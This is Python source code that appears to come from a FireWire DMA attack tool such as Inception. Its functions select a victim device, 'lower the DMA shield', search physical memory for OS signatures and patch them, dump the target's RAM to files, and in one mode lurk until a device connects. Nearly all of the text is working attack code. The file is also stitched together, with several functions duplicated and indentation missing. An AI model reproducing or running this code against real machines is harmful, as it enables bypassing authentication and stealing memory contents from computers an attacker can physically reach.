def __init__(self):
'''
Constructor
Initializes the bus and sets device, OUI variables
'''
self._bus = Bus()
try:
self._bus.enable_sbp2()
except IOError:
poll('FireWire modules do not seem to be loaded. Load them? ' +
'[Y/n]: ')
answer = input().lower()
if answer in ['y', '']:
status = call('modprobe firewire-ohci', shell=True)
if status == 0:
try:
self._bus.enable_sbp2()
except IOError:
time.sleep(2) # Give some more time
self._bus.enable_sbp2() # If this fails, fail hard
info('FireWire modules loaded successfully')
else:
fail('Could not load FireWire modules')
else:
fail('FireWire modules not loaded')
# Enable SBP-2 support to ensure we get DMA
self._devices = self._bus.devices()
self._oui = self.init_OUI()
self._vendors = []
self._max_request_size = cfg.PAGESIZE
def printdetails(target): # TODO: Fix this fugly method
'''
Prints details about a target
'''
info('The target module contains the following signatures:')
separator()
print('\tVersions:\t' + ', '.join(target['versions']).rstrip(', '))
print('\tArchitectures:\t' + ', '
.join(target['architectures']).rstrip(', '))
for signature in target['signatures']:
offsets = '\n\t\tOffsets:\t'
for offset in signature['offsets']:
offsets += hex(offset)
if not offset is signature['offsets'][-1]: offsets += ', '
print(offsets)
sig = '\t\tSignature:\t0x'
ioffs = 0
patch = 0
poffs = 0
for chunk in signature['chunks']:
diff = chunk['internaloffset'] - bytelen(chunk['chunk']) - 1 - ioffs
sig += '__' * diff
ioffs = chunk['internaloffset']
sig += '{0:x}'.format(chunk['chunk'])
try:
patch = chunk['patch']
poffs = chunk['patchoffset']
except KeyError: pass
print(sig)
print('\t\tPatch:\t\t{0:#x}'.format(patch))
print('\t\tPatch offset:\t{0:#x}'.format(poffs))
separator()
def __init__(self):
'''
Constructor
Initializes the bus and sets device, OUI variables
'''
self._bus = Bus()
try:
self._bus.enable_sbp2()
except IOError:
poll('FireWire modules do not seem to be loaded. Load them? ' +
'[Y/n]: ')
answer = input().lower()
if answer in ['y', '']:
status = call('modprobe firewire-ohci', shell=True)
if status == 0:
try:
self._bus.enable_sbp2()
except IOError:
time.sleep(2) # Give some more time
self._bus.enable_sbp2() # If this fails, fail hard
info('FireWire modules loaded successfully')
else:
fail('Could not load FireWire modules')
else:
fail('FireWire modules not loaded')
# Enable SBP-2 support to ensure we get DMA
self._devices = self._bus.devices()
self._oui = self.init_OUI()
self._vendors = []
self._max_request_size = cfg.PAGESIZE
def list_targets(targets, details=False):
info('Available targets:')
separator()
for number, target in enumerate(targets, 1):
info(target['OS'] + ': ' + target['name'], sign = number)
if details:
printdetails(target)
if not details: # Avoid duplicate separator
separator()
def businfo(self):
'''
Prints all available information of the devices connected to the FW
bus, looks up missing vendor names & populates the internal vendor
list
'''
if not self._devices:
fail('No FireWire devices detected on the bus')
info('FireWire devices on the bus (names may appear blank):')
separator()
for n, device in enumerate(self._devices, 1):
vid = device.vendor_id
vendorname = device.vendor_name.decode(cfg.encoding)
# Resolve if name not given by device vendor ID
if not vendorname:
vendorname = self.resolve_oui(vid)
self._vendors.append(vendorname)
pid = device.product_id
productname = device.product_name.decode(cfg.encoding)
info('Vendor (ID): {0} ({1:#x}) | Product (ID): {2} ({3:#x})'
.format(vendorname, vid, productname, pid), sign = n)
separator()
def patch(device, address, chunks):
'''
Writes back to the device at address, using the patches in the signature
chunks
'''
success = True
for c in chunks:
patch = c['patch']
if not patch:
continue
ioffset = c['internaloffset']
poffset = c['patchoffset']
if not poffset:
poffset = 0
realaddress = address + ioffset + poffset
if patch:
device.write(realaddress, patch)
read = device.read(realaddress, len(patch))
if cfg.verbose:
info('Data read back: ' + bytes2hexstr(read))
if read != patch:
success = False
return success
def businfo(self):
'''
Prints all available information of the devices connected to the FW
bus, looks up missing vendor names & populates the internal vendor
list
'''
if not self._devices:
fail('No FireWire devices detected on the bus')
info('FireWire devices on the bus (names may appear blank):')
separator()
for n, device in enumerate(self._devices, 1):
vid = device.vendor_id
vendorname = device.vendor_name.decode(cfg.encoding)
# Resolve if name not given by device vendor ID
if not vendorname:
vendorname = self.resolve_oui(vid)
self._vendors.append(vendorname)
pid = device.product_id
productname = device.product_name.decode(cfg.encoding)
info('Vendor (ID): {0} ({1:#x}) | Product (ID): {2} ({3:#x})'.
format(vendorname, vid, productname, pid),
sign=n)
separator()
def lurk():
start = cfg.startaddress
end = cfg.memsize
bb = BeachBall()
try:
s = '\n'.join(cfg.wrapper.wrap('[-] Lurking in the shrubbery waiting ' +
'for a device to connect. Ctrl-C to ' +
'abort')) + '\r'
print(s, end = '')
# Initiate FireWire
fw = firewire.FireWire()
while True: # Loop until aborted, and poll for devices
while len(fw.devices) == 0:
bb.draw()
time.sleep(cfg.polldelay)
pass # Do nothing until a device connects
print() # Newline
info('FireWire device detected')
memdump.dump(start, end)
except KeyboardInterrupt:
print() # TODO: Fix keyboard handling (interrupt handling)
raise KeyboardInterrupt
def select_device(self):
'''
Present the user of the option to select what device (connected to the
bus) to attack
'''
if not self._vendors:
self.businfo()
nof_devices = len(self._vendors)
if nof_devices == 1:
info('Only one device present, device auto-selected as target')
return 0
else:
poll('Please select a device to attack (or type \'q\' to quit): ')
selected = input()
try:
selected = int(selected)
except:
if selected == 'q': sys.exit()
else:
warn('Invalid selection, please try again. Type \'q\' ' +
'to quit')
return self.select_device()
if 0 < selected <= nof_devices:
i = selected - 1
vendor = self._vendors[i]
# If the target is a Mac, and we are in memdump mode with the
# --override switch set, make sure we don't touch OS X's g-spot
if 'apple' in vendor.lower() and cfg.memdump and cfg.override:
cfg.apple_target = True
info('The target seems to be a Mac, forcing avoidance ' +
'(not dumping {0:#x}-{1:#x})'.format(
cfg.apple_avoid[0], cfg.apple_avoid[1]))
return i
else:
warn('Please enter a selection between 1 and ' + str(nof_devices) +
'. Type \'q\' to quit')
return self.select_device()
def select_device(self):
'''
Present the user of the option to select what device (connected to the
bus) to attack
'''
if not self._vendors:
self.businfo()
nof_devices = len(self._vendors)
if nof_devices == 1:
info('Only one device present, device auto-selected as target')
return 0
else:
poll('Please select a device to attack (or type \'q\' to quit): ')
selected = input()
try:
selected = int(selected)
except:
if selected == 'q': sys.exit()
else:
warn('Invalid selection, please try again. Type \'q\' ' +
'to quit')
return self.select_device()
if 0 < selected <= nof_devices:
i = selected - 1
vendor = self._vendors[i]
# If the target is a Mac, and we are in memdump mode with the
# --override switch set, make sure we don't touch OS X's g-spot
if 'apple' in vendor.lower() and cfg.memdump and cfg.override:
cfg.apple_target = True
info('The target seems to be a Mac, forcing avoidance ' +
'(not dumping {0:#x}-{1:#x})'
.format(cfg.apple_avoid[0], cfg.apple_avoid[1]))
return i
else:
warn('Please enter a selection between 1 and ' + str(nof_devices) +
'. Type \'q\' to quit')
return self.select_device()
def select_target(targets, selected=False):
'''
Provides easy selection of targets. Input is a list of targets (dicts)
'''
if len(targets) == 1:
info('Only one target present, auto-selected')
return targets[0]
if not selected:
poll('Please select target (or enter \'q\' to quit):')
selected = input()
nof_targets = len(targets)
try:
selected = int(selected)
except:
if selected == 'q': sys.exit()
else:
warn('Invalid selection, please try again. Type \'q\' to quit')
return select_target(targets)
if 0 < selected <= nof_targets:
return targets[selected - 1]
else:
warn('Please enter a selection between 1 and ' + str(nof_targets) +
'. Type \'q\' to quit')
return select_target(targets)
def attack(targets):
'''
Main attack logic
'''
# Initialize and lower DMA shield
if not cfg.filemode:
try:
fw = FireWire()
except IOError:
fail('Could not initialize FireWire. Are the modules loaded into ' +
'the kernel?')
start = time.time()
device_index = fw.select_device()
# Print selection
info('Selected device: {0}'.format(fw.vendors[device_index]))
# List targets
list_targets(targets)
# Select target
target = select_target(targets)
# Print selection. If verbose, print selection with signatures
info('Selected target: ' + target['OS'] + ': ' + target['name'])
if cfg.verbose:
printdetails(target)
# Lower DMA shield or use a file as input, and set memsize
device = None
memsize = None
if cfg.filemode:
device = MemoryFile(cfg.filename, cfg.PAGESIZE)
memsize = os.path.getsize(cfg.filename)
else:
elapsed = int(time.time() - start)
device = fw.getdevice(device_index, elapsed)
memsize = cfg.memsize
# Perform parallel search for all signatures for each OS at the known
# offsets
info('DMA shields should be down by now. Attacking...')
address, chunks = searchanddestroy(device, target, memsize)
if not address:
# TODO: Fall-back sequential search?
return None, None
# Signature found, let's patch
mask = 0xfffff000 # Mask away the lower bits to find the page number
page = int((address & mask) / cfg.PAGESIZE)
info('Signature found at {0:#x} (in page # {1})'.format(address, page))
if not cfg.dry_run:
success = patch(device, address, chunks)
if success:
info('Write-back verified; patching successful')
if cfg.egg:
sound.play('data/inception.wav')
info('BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!')
else:
warn('Write-back could not be verified; patching *may* have been ' +
'unsuccessful')
#Clean up
device.close()
return address, page
def dump(start, end):
# Make sure that the right mode is set
cfg.memdump = True
requestsize = cfg.max_request_size
size = end - start
# Open file for writing
filename = '{0}_{1}-{2}.bin'.format(cfg.memdump_prefix, hex(start),
hex(end))
file = open(filename, 'wb')
# Ensure correct denomination
if size % cfg.GiB == 0:
s = '{0} GiB'.format(size // cfg.GiB)
elif size % cfg.MiB == 0:
s = '{0} MiB'.format(size // cfg.MiB)
else:
s = '{0} KiB'.format(size // cfg.KiB)
info('Dumping from {0:#x} to {1:#x}, a total of {2}'.format(start, end, s))
# Initialize and lower DMA shield
if not cfg.filemode:
fw = FireWire()
starttime = time.time()
device_index = fw.select_device()
# Print selection
info('Selected device: {0}'.format(fw.vendors[device_index]))
# Lower DMA shield or use a file as input
device = None
if cfg.filemode:
device = MemoryFile(cfg.filename, cfg.PAGESIZE)
else:
elapsed = int(time.time() - starttime)
device = fw.getdevice(device_index, elapsed)
# Progress bar
prog = ProgressBar(min_value=start,
max_value=end,
total_width=cfg.termwidth,
print_data=cfg.verbose)
try:
for i in range(start, end, requestsize):
# Edge case, make sure that we don't read beyond the end
if i + requestsize > end:
requestsize = end - i
# Avoid accessing upper memory area if we are using FireWire
if needtoavoid(i):
data = b'\x00' * requestsize
else:
data = device.read(i, requestsize)
file.write(data)
# Print status
prog.update_amount(i + requestsize, data)
prog.draw()
file.close()
print() # Filler
info('Dumped memory to file {0}'.format(filename))
device.close()
except KeyboardInterrupt:
file.close()
print()
info('Dumped memory to file {0}'.format(filename))
raise KeyboardInterrupt
def dump(start, end):
# Make sure that the right mode is set
cfg.memdump = True
requestsize = cfg.max_request_size
size = end - start
# Open file for writing
filename = '{0}_{1}-{2}.bin'.format(cfg.memdump_prefix,
hex(start), hex(end))
file = open(filename, 'wb')
# Ensure correct denomination
if size % cfg.GiB == 0:
s = '{0} GiB'.format(size//cfg.GiB)
elif size % cfg.MiB == 0:
s = '{0} MiB'.format(size//cfg.MiB)
else:
s = '{0} KiB'.format(size//cfg.KiB)
info('Dumping from {0:#x} to {1:#x}, a total of {2}'.format(start, end, s))
# Initialize and lower DMA shield
if not cfg.filemode:
fw = FireWire()
starttime = time.time()
device_index = fw.select_device()
# Print selection
info('Selected device: {0}'.format(fw.vendors[device_index]))
# Lower DMA shield or use a file as input
device = None
if cfg.filemode:
device = MemoryFile(cfg.filename, cfg.PAGESIZE)
else:
elapsed = int(time.time() - starttime)
device = fw.getdevice(device_index, elapsed)
# Progress bar
prog = ProgressBar(min_value = start, max_value = end,
total_width = cfg.termwidth, print_data = cfg.verbose)
try:
for i in range(start, end, requestsize):
# Edge case, make sure that we don't read beyond the end
if i + requestsize > end:
requestsize = end - i
# Avoid accessing upper memory area if we are using FireWire
if needtoavoid(i):
data = b'\x00' * requestsize
else:
data = device.read(i, requestsize)
file.write(data)
# Print status
prog.update_amount(i + requestsize, data)
prog.draw()
file.close()
print() # Filler
info('Dumped memory to file {0}'.format(filename))
device.close()
except KeyboardInterrupt:
file.close()
print()
info('Dumped memory to file {0}'.format(filename))
raise KeyboardInterrupt
